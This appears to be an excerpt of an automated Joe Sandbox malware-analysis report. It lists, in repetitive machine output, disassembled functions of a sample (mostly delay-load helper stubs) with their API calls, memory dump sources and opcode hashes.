                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 99185e8fdfb3f6a1dc01f5bdf29df5f198fd451769c717291266588797a56e9a
                                                                                                                                                                            • Instruction ID: bd7917e9dea1f2a790a8b4be00a11e922f8e4e17a0728e578f3308313ef97cd1
                                                                                                                                                                            • Opcode Fuzzy Hash: 99185e8fdfb3f6a1dc01f5bdf29df5f198fd451769c717291266588797a56e9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 46A002DA6BE111BC31097256FE07D3B121DC9D2F29331E62EF881D58CAA8D09EF51531
                                                                                                                                                                            Function 00264B71 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 19ee2e9fec2ff7e07ec5ad1cb59fb0a728f68a57229944729d5d54cccc478ae6
                                                                                                                                                                            • Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
                                                                                                                                                                            • Opcode Fuzzy Hash: 19ee2e9fec2ff7e07ec5ad1cb59fb0a728f68a57229944729d5d54cccc478ae6
                                                                                                                                                                            • Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
                                                                                                                                                                            Function 00264B7B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 4262bea3dadba92975d7d18f7c273363348ab5c57ecdbb4155e39dbec3e9a3e1
                                                                                                                                                                            • Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
                                                                                                                                                                            • Opcode Fuzzy Hash: 4262bea3dadba92975d7d18f7c273363348ab5c57ecdbb4155e39dbec3e9a3e1
                                                                                                                                                                            • Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
                                                                                                                                                                            Function 00264B49 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 510f32299e5c8e45de388f2e1a77a01420b8e137b4a11410f68ccd98f99815bd
                                                                                                                                                                            • Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
                                                                                                                                                                            • Opcode Fuzzy Hash: 510f32299e5c8e45de388f2e1a77a01420b8e137b4a11410f68ccd98f99815bd
                                                                                                                                                                            • Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
                                                                                                                                                                            Function 00264B53 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 54194da8214751aca9872859fc282d18c28e65ad1c362f6d689cd2429917738b
                                                                                                                                                                            • Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
                                                                                                                                                                            • Opcode Fuzzy Hash: 54194da8214751aca9872859fc282d18c28e65ad1c362f6d689cd2429917738b
                                                                                                                                                                            • Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
                                                                                                                                                                            Function 00264B85 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264B3B
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: d6789ae46aaf5d16fbf41ffba05fc73d8b232c3303410febb6861633e2e162cc
                                                                                                                                                                            • Instruction ID: 2a8595d74667c3cd00b46d5d9195e2584291477e076de54850dd0ea27508f06c
                                                                                                                                                                            • Opcode Fuzzy Hash: d6789ae46aaf5d16fbf41ffba05fc73d8b232c3303410febb6861633e2e162cc
                                                                                                                                                                            • Instruction Fuzzy Hash: BEA002DA6BE112FC31097256AE07D3B121DC5C6F69331EA2EF882C58CAA8C09DF51531
                                                                                                                                                                            Function 00264CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 0850bc8e7c308d081b0b106c0b24f2b60126d81100785d03b0cf15a70db390c8
                                                                                                                                                                            • Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
                                                                                                                                                                            • Opcode Fuzzy Hash: 0850bc8e7c308d081b0b106c0b24f2b60126d81100785d03b0cf15a70db390c8
                                                                                                                                                                            • Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
                                                                                                                                                                            Function 00264CE4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 6bc96e1aade6ecbf03f71b05d4c6088b5435d08d0450f767d54678cc75bbe9af
                                                                                                                                                                            • Instruction ID: 3167044138976261e5678662d4dbe8e27018e682c54510f4bbd6e82c04365d60
                                                                                                                                                                            • Opcode Fuzzy Hash: 6bc96e1aade6ecbf03f71b05d4c6088b5435d08d0450f767d54678cc75bbe9af
                                                                                                                                                                            • Instruction Fuzzy Hash: 93A0019E2BE512FD710873516E07C3B021DD5D2B21331861AF881D5586A98159E915B1
                                                                                                                                                                            Function 00264CFF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 8dd1823d20e89859f087fd56637279135110158220fb85cbc5c0331a31c40339
                                                                                                                                                                            • Instruction ID: 33e6ea9128c3586a185991649f700f2d030352b0a0ff1f1d644b18247cec36f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 8dd1823d20e89859f087fd56637279135110158220fb85cbc5c0331a31c40339
                                                                                                                                                                            • Instruction Fuzzy Hash: E9A0019A2BE512FC710873516E07C3B021DD5D6B613318A1AF882C5586A98159E91571
                                                                                                                                                                            Function 00264CC6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: ed7d97e0cb4ad913e7a78d0675e9d6745f5e798b4390fe006ae4c0962f797c0d
                                                                                                                                                                            • Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
                                                                                                                                                                            • Opcode Fuzzy Hash: ed7d97e0cb4ad913e7a78d0675e9d6745f5e798b4390fe006ae4c0962f797c0d
                                                                                                                                                                            • Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
                                                                                                                                                                            Function 00264CD0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 82670cf426e7f6517244f57bed0a31dbff29b59b84d642269bf5491b1872eade
                                                                                                                                                                            • Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
                                                                                                                                                                            • Opcode Fuzzy Hash: 82670cf426e7f6517244f57bed0a31dbff29b59b84d642269bf5491b1872eade
                                                                                                                                                                            • Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
                                                                                                                                                                            Function 00264CDA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264C90
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 3906f3e3d6c31e8f216593dbe7e45c3cdb192e6a85a466becfb46c256fddda74
                                                                                                                                                                            • Instruction ID: 06f1a1c88baf3c6c892a661bfb756df0898024d3dcc2ab10c4bece9d4a818692
                                                                                                                                                                            • Opcode Fuzzy Hash: 3906f3e3d6c31e8f216593dbe7e45c3cdb192e6a85a466becfb46c256fddda74
                                                                                                                                                                            • Instruction Fuzzy Hash: FBA002DA2BF116FC710872516E07C3B461DC5C6F613328A1FF882C59C6A8C05DF51531
                                                                                                                                                                            Function 00264D13 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264CF1
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1269201914-0
                                                                                                                                                                            • Opcode ID: 60a115470e1a6d0d49e9c0e4f0581c42553a4da5725dac9899e57de656c1f18d
                                                                                                                                                                            • Instruction ID: 33e6ea9128c3586a185991649f700f2d030352b0a0ff1f1d644b18247cec36f2
                                                                                                                                                                            • Opcode Fuzzy Hash: 60a115470e1a6d0d49e9c0e4f0581c42553a4da5725dac9899e57de656c1f18d
                                                                                                                                                                            • Instruction Fuzzy Hash: E9A0019A2BE512FC710873516E07C3B021DD5D6B613318A1AF882C5586A98159E91571
                                                                                                                                                                            Function 00241DE7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,?,?), ref: 00241DFC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3367045223-0
                                                                                                                                                                            • Opcode ID: 94551cc92b48180fc16bce61140b4eded8f4082999a98def4349f1b4ee7fd84d
                                                                                                                                                                            • Instruction ID: f248bd6a27a517bc7e9f808bb50a1313d5d812fffcc626cdbc1f2599a25fce89
